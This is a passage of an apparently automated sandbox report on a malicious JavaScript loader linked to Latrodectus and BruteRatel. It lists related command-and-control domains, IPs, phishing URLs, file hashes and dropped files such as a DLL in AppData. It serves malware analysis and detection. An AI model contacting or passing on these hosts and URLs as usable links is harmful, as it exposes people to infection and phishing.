                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • GSI enabled (Javascript)
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:Document-18-33-08.js
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.spre.troj.evad.winJS@10/21@8/4
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                              • Number of executed functions: 55
                                                                                                                                                                                              • Number of non-executed functions: 217
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .js

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • VT rate limit hit for: Document-18-33-08.js

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              14:42:02API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                              14:42:03API Interceptor3262165x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                              14:42:54API Interceptor1255883x Sleep call for process: explorer.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              188.114.96.31tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                                                                                                                                              http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • asm.alcateia.org/
                                                                                                                                                                                              hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                                                                                                                                                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.bayarcepat19.click/g48c/
                                                                                                                                                                                              update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.bayarcepat19.click/5hcm/
                                                                                                                                                                                              docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                                                              https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                                                              http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                                                              http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                                                              http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                              • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                                                              82.115.223.39Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                  dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                    Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                        DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          80.78.24.30e664858e8b8ff1ac08f6dd812a68d65d05a704262fa13862538c3c45.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • fredlomberhfile.com:2351/lpfdokkq
                                                                                                                                                                                                          s5YgOFFmFK.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • smockalifatori.com/
                                                                                                                                                                                                          CiMXn78mMb.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • skayfingertawr.com/
                                                                                                                                                                                                          Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                          Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                          Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                          Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                          05387199.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • shoterqana.com/
                                                                                                                                                                                                          08778399.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • shoterqana.com/
                                                                                                                                                                                                          Contract_March_23_INV#305.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                          • aoureskindzet.com/

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          bazarunet.comDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 185.106.92.54
                                                                                                                                                                                                          Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.116
                                                                                                                                                                                                          CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                          • 193.124.185.116
                                                                                                                                                                                                          x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.116
                                                                                                                                                                                                          7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.116
                                                                                                                                                                                                          tiguanin.comDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.40
                                                                                                                                                                                                          Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.117
                                                                                                                                                                                                          CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                          • 193.124.185.117
                                                                                                                                                                                                          x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.117
                                                                                                                                                                                                          7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 193.124.185.117
                                                                                                                                                                                                          isomicrotich.comDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          greshunka.comDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 92.118.112.130
                                                                                                                                                                                                          CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                          • 92.118.112.130
                                                                                                                                                                                                          x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 92.118.112.130
                                                                                                                                                                                                          7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 92.118.112.130

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          SERVERIUS-ASNLRfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                          • 45.67.228.7
                                                                                                                                                                                                          Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          qi2l3hPcRE.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          q07Xd63y5Y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          dTKkoWZusB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 188.119.113.59
                                                                                                                                                                                                          MIDNET-ASTK-TelecomRUDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                          failure.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 82.115.223.234
                                                                                                                                                                                                          web3Interface.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 82.115.223.234
                                                                                                                                                                                                          71uf5c9puG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 82.115.223.228
                                                                                                                                                                                                          Nz0P9RlrUC.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 82.115.223.136
                                                                                                                                                                                                          CYBERDYNELRponos.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                          • 80.78.28.83
                                                                                                                                                                                                          SecuriteInfo.com.Heuristic.HEUR.AGEN.1313656.13208.30309.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                          • 80.78.28.83
                                                                                                                                                                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 46.246.44.223
                                                                                                                                                                                                          SecuriteInfo.com.Malicious_Behavior.SB.8937.18140.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 80.78.24.250
                                                                                                                                                                                                          67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 46.246.43.211
                                                                                                                                                                                                          attach#6081-18-03-2024.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 198.167.201.153
                                                                                                                                                                                                          bin.elfGet hashmaliciousPwnRig MinerBrowse
                                                                                                                                                                                                          • 80.78.24.30
                                                                                                                                                                                                          http://5d1d57a7.28cb0c8c5155aeac03abaf42.workers.dev/?qrc=cHN0b2VsdGluZ0Btb29nLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.24.136
                                                                                                                                                                                                          https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui-2FiJiLFhXN-2BaAoUhaFeS5thEexIiWqEF8dt08iW6JSqntxNZ_ZhPcx6WPs4ZPfYHsVw3kGc95DdiOlu2Hqu3wtZDfTdxDhqDrDyhN4LIHSWlo-2Bo5W6aEC693CmZYOUsRsAHZjNYMetybYb1uYwCQGuNUgutLCzNtMSdcaod8HflZ3qtLEYfvJ3h120nclv-2FPwWe4ZMuwG1g5FU0h57N477RbEMQV2-2FUVsni6xHvVTRhTmHDzgfD-2F3g-2BckOgde-2F51-2FeyDF08iaXxzVHgagCQPKWzGeSlI6hU-2B61MmZjONA8snu2jD66uyBw5PSnYyn0fMKgCqj-2FNBTJqL-2FTN8YlBx1uy4KooCKJiqFqcR8WxhpSnrzCOJaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.25.211
                                                                                                                                                                                                          https://d511cad4.9a81985336ae1461f17112ae.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 80.78.25.211
                                                                                                                                                                                                          CLOUDFLARENETUStMREqVW0.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                          • 104.20.3.235
                                                                                                                                                                                                          https://auth-owlting.com/enterprise/core.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.204.46
                                                                                                                                                                                                          https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          https://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                          • 172.67.204.105
                                                                                                                                                                                                          http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.26.6.103
                                                                                                                                                                                                          wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                          https://secured.viewonlineportalshared.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                          RfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                          • 1.2.3.4
                                                                                                                                                                                                          https://dsfghfdaregfdgshfgdfh.blob.core.windows.net/dsfghfdaregfdgshfgdfh/l1.html#9/372-16527/1270-243896-29108Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                          • 104.21.32.108
                                                                                                                                                                                                          https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg-2BtYQAbYWaU-2BKDDWa611GxHig-2BgElXnUy1eAOeNoTI9ToS9WuAxRUdR21lAIsTPE0g-3D-3Dd8kL_bf4JG6rVotaFp8XsYJMcbHq5p6ju5xz6OkJFWJQMhev1YsQkFFV7zJr96yz5256BnjjwP-2FrVNKeomJDukUeXnM2-2FUbrpvrFpNFdN8Hxo-2B8NA1G5PPzQiWnVnq4RPrf4MxseS-2FjeJBGe3OOYXNXxDmns1gfYeFwrIC6tXtQ3KJv23PKABAyqpBB-2FnsXl7BropPMbry14s3UYpaAeg1aJih0NQeQpVSOm5MBDYOXEHCyJCtLrpoW6SuZeJlGeeWyYAhbotSAdFsjwH5JN5fjIYp-2BMzHm9VPykPI2oeKmW91mIcQqO5YJ1dVv925b7N0T1vGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.247.203

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1c84f2f8df965727bcdcc4de6beecf70c960ef7c885e77.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          0a839761915d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          sqlite.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          hVLguQ1OyJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          C:\Windows\Installer\MSIF101.tmpDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                            dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                              Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                  Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                    CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                        6ylVfr0IVw.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                          Document-19-25-24.jsGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                            vfs.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                              C:\Windows\Installer\MSIF160.tmpDocument-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                  Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                    DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                        CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                            6ylVfr0IVw.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                                              Document-19-25-24.jsGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                                                vfs.msiGet hashmaliciousLatrodectusBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\Config.Msi\4df20b.rbs

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1208
                                                                                                                                                                                                                                                  Entropy (8bit):5.666842674497995
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:hOgJsrvgTU68NWdhW/nHN9RpU6Wg2FP+WDhiSQ8lVWfLK:UusrIn8NWdhWPHN9b76P3D8S/H
                                                                                                                                                                                                                                                  MD5:C9AB2AEB282DFE0099AE981249C33A4F
                                                                                                                                                                                                                                                  SHA1:A5C65512BD2E34ACBA1829A10B6C5F049668E345
                                                                                                                                                                                                                                                  SHA-256:5664B2DDF9539278B3437074D0383E16B10EB525549DAD7C83A38CD8EDCAC921
                                                                                                                                                                                                                                                  SHA-512:33FEDD667AFDF245AA0370D98EDF9BE655492EB26AC85CAB611C3078C3A8BDC5B49B31267ED1C9694BCC824C4AEDEA089F245068A1FDF5E189F37209F089B84E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@QuCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@........CreateFolders..Creating folders..Folder: [1]#.:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6].. .C:\Users\user\AppData\Roaming\....2.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll....WriteRegistryValues..Writing system registry values..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\vierm_soft_x64.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):767488
                                                                                                                                                                                                                                                  Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                                                  MD5:B1CA25F5BB4EDD293B3711C77EB99A6F
                                                                                                                                                                                                                                                  SHA1:178BBA8686EA329B884A652FE0F8A0AE0C53D367
                                                                                                                                                                                                                                                  SHA-256:97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                                                                                                                                                                                                                                                  SHA-512:D5A282A8F81E117B79616C44A260D89C7FEE06F4AC1387675BC79C3BD7599A5D49FBE3D8FB3D4D42EEA81A17564ABC2D42288BC2DC468D1B16ED633BA421B32D
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y...................G......G......G.....Y......Y......Y.......G......G......G......G.....Rich...........................PE..d......f..........# ...&.............Y.......................................0......R..... .............................................|...<...(.......X6...p...C..H~...*... ..........p...............................@............................................text...0........................... ..`.rdata...8.......:..................@..@.data....4...0......................@....pdata...C...p...D...*..............@..@memcpy_..............n..............@..._RDATA...............p..............@..@.rsrc...X6.......8...r..............@..@.reloc....... ......................@..B.......................................................................LfJGC6FArPDu4R9wt3v8YWSQNm7nxB2ZdHqjXsp..........................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI7623.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
